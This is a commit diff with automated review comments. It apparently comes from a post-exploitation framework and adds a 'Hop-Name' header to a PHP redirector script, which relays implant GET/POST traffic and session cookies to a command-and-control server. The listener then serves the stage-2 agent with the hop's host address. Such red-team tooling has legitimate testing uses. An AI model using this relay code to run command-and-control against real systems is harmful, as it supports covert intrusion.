parent
619ae2c132
commit
6c3f51aca9
|
@ -1,18 +1,22 @@
|
||||||
<?php
|
<?php
|
||||||
|
|
||||||
$server = rtrim("REPLACE_SERVER", '/');
|
$server = rtrim("REPLACE_SERVER", '/');
|
||||||
|
$hopName = "REPLACE_HOP_NAME";
|
||||||
|
|
||||||
|
|
||||||
function do_get_request($url, $optionalHeaders = null)
|
function do_get_request($url, $optionalHeaders = null)
|
||||||
{
|
{
|
||||||
|
global $hopName;
|
||||||
$aContext = array(
|
$aContext = array(
|
||||||
'http' => array(
|
'http' => array(
|
||||||
'method' => 'GET'
|
'method' => 'GET'
|
||||||
),
|
),
|
||||||
);
|
);
|
||||||
|
$headers = array('Hop-Name' => $hopName);
|
||||||
if ($optionalHeaders !== null) {
|
if ($optionalHeaders !== null) {
|
||||||
$aContext['http']['header'] = $optionalHeaders;
|
$headers['Cookie'] = $optionalHeaders;
|
||||||
}
|
}
|
||||||
|
$aContext['http']['header'] = prepareHeaders($headers);
|
||||||
$cxContext = stream_context_create($aContext);
|
$cxContext = stream_context_create($aContext);
|
||||||
echo file_get_contents($url, False, $cxContext);
|
echo file_get_contents($url, False, $cxContext);
|
||||||
}
|
}
|
||||||
|
@ -20,13 +24,16 @@ function do_get_request($url, $optionalHeaders = null)
|
||||||
|
|
||||||
function do_post_request($url, $data, $optionalHeaders = null)
|
function do_post_request($url, $data, $optionalHeaders = null)
|
||||||
{
|
{
|
||||||
|
global $hopName;
|
||||||
$params = array('http' => array(
|
$params = array('http' => array(
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'content' => $data
|
'content' => $data
|
||||||
));
|
));
|
||||||
|
$headers = array('Hop-Name' => $hopName);
|
||||||
if ($optionalHeaders !== null) {
|
if ($optionalHeaders !== null) {
|
||||||
$params['http']['header'] = $optionalHeaders;
|
$headers['Cookie'] = $optionalHeaders;
|
||||||
}
|
}
|
||||||
|
$params['http']['header'] = prepareHeaders($headers);
|
||||||
$ctx = stream_context_create($params);
|
$ctx = stream_context_create($params);
|
||||||
$fp = @fopen($url, 'rb', false, $ctx);
|
$fp = @fopen($url, 'rb', false, $ctx);
|
||||||
if (!$fp) {
|
if (!$fp) {
|
||||||
|
@ -39,11 +46,24 @@ function do_post_request($url, $data, $optionalHeaders = null)
|
||||||
echo $response;
|
echo $response;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function prepareHeaders($headers) {
|
||||||
|
$flattened = array();
|
||||||
|
|
||||||
|
foreach ($headers as $key => $header) {
|
||||||
|
if (is_int($key)) {
|
||||||
|
$flattened[] = $header;
|
||||||
|
} else {
|
||||||
|
$flattened[] = $key.': '.$header;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return implode("\r\n", $flattened);
|
||||||
|
}
|
||||||
|
|
||||||
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
|
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
|
||||||
$requestURI = $_SERVER['REQUEST_URI'];
|
$requestURI = $_SERVER['REQUEST_URI'];
|
||||||
if(isset($_COOKIE['session'])) {
|
if(isset($_COOKIE['session'])) {
|
||||||
return do_get_request($server.$requestURI, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return do_get_request($server.$requestURI);
|
return do_get_request($server.$requestURI);
|
||||||
|
@ -56,7 +76,7 @@ else {
|
||||||
$postdata = file_get_contents("php://input");
|
$postdata = file_get_contents("php://input");
|
||||||
|
|
||||||
if(isset($_COOKIE['session'])) {
|
if(isset($_COOKIE['session'])) {
|
||||||
return do_post_request($server.$requestURI, $postdata, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return do_post_request($server.$requestURI, $postdata);
|
return do_post_request($server.$requestURI, $postdata);
|
||||||
|
|
|
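Review bot: `$headers['Cookie'] = $optionalHeaders;` in do_get_request, and the same line in do_post_request, now treat the third parameter as a bare cookie string, but the parameter is still named `$optionalHeaders` with a `null` default, which no longer describes what the callers in the later hunks pass (`"session=..."`). Renaming it in both signatures and both call sites, with a docblock along the lines of `@param string|null $cookie value sent as the Cookie header, or null to send none`, would keep the API honest. Because prepareHeaders joins header lines with `"\r\n"`, the value copied from `$_COOKIE['session']` should also be stripped of CR/LF before it becomes a header line, e.g. `"session=".str_replace([' ', "\r", "\n"], ['+', '', ''], $_COOKIE['session'])` in place of the current space-only replacement. Both request functions additionally read `$hopName` through `global`; passing it as an argument, or defining it as a constant, would make that dependency explicit.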
@ -747,8 +747,16 @@ def send_message(packets=None):
|
||||||
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
|
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
|
||||||
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
|
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
|
||||||
|
|
||||||
|
hopListenerName = request.headers.get('Hop-Name')
|
||||||
|
try:
|
||||||
|
hopListener = helpers.get_listener_options(hopListenerName)
|
||||||
|
tempListenerOptions = copy.deepcopy(listenerOptions)
|
||||||
|
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
|
||||||
|
except TypeError:
|
||||||
|
tempListenerOptions = listenerOptions
|
||||||
|
|
||||||
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
|
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
|
||||||
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
|
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions)
|
||||||
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
|
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
|
||||||
# TODO: wrap ^ in a routing packet?
|
# TODO: wrap ^ in a routing packet?
|
||||||
|
|
||||||
|
|
|
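Review bot: The `try`/`except TypeError` around the new hop lookup hides the actual condition being handled; it presumably relies on `helpers.get_listener_options` returning `None` for a missing or unknown `Hop-Name`, so that subscripting fails, but it will also swallow any other TypeError raised by `copy.deepcopy` or the nested `['Host']['Value']` access. Testing the result explicitly makes the intent visible and keeps unrelated errors from being silenced; the rewrite below assumes the `None`-on-miss behaviour, which should be confirmed against `helpers.get_listener_options`. A short comment such as `# A request relayed by a hop carries its listener name; advertise that host instead of ours` would document why the options are copied. The enclosing function starts and ends outside this hunk.
```python
hopListenerName = request.headers.get('Hop-Name')
hopListener = helpers.get_listener_options(hopListenerName) if hopListenerName else None
if hopListener is not None:
    tempListenerOptions = copy.deepcopy(listenerOptions)
    tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
else:
    tempListenerOptions = listenerOptions
# … unchanged: step 6 comment, generate_agent(listenerOptions=tempListenerOptions), encryption …
```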
@ -440,6 +440,7 @@ def send_message(packets=None):
|
||||||
f.close()
|
f.close()
|
||||||
|
|
||||||
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
|
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
|
||||||
|
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
|
||||||
|
|
||||||
saveFolder = self.options['OutFolder']['Value']
|
saveFolder = self.options['OutFolder']['Value']
|
||||||
for uri in uris:
|
for uri in uris:
|
||||||
|
|
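Review bot: `hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])` substitutes the listener name verbatim into what the PHP template declares as a double-quoted string literal (`$hopName = "REPLACE_HOP_NAME";`), so a name containing `"`, `\` or `$` would produce broken or unintended PHP. Escaping those characters before substitution, e.g. `hopName = self.options['Name']['Value'].replace('\\', '\\\\').replace('"', '\\"').replace('$', '\\$')`, or validating the name against a conservative character set where the option is set, closes that gap. The same value is later sent as the `Hop-Name` HTTP header by the generated script, which is a second reason to keep it to header-safe characters. The enclosing function starts outside this hunk.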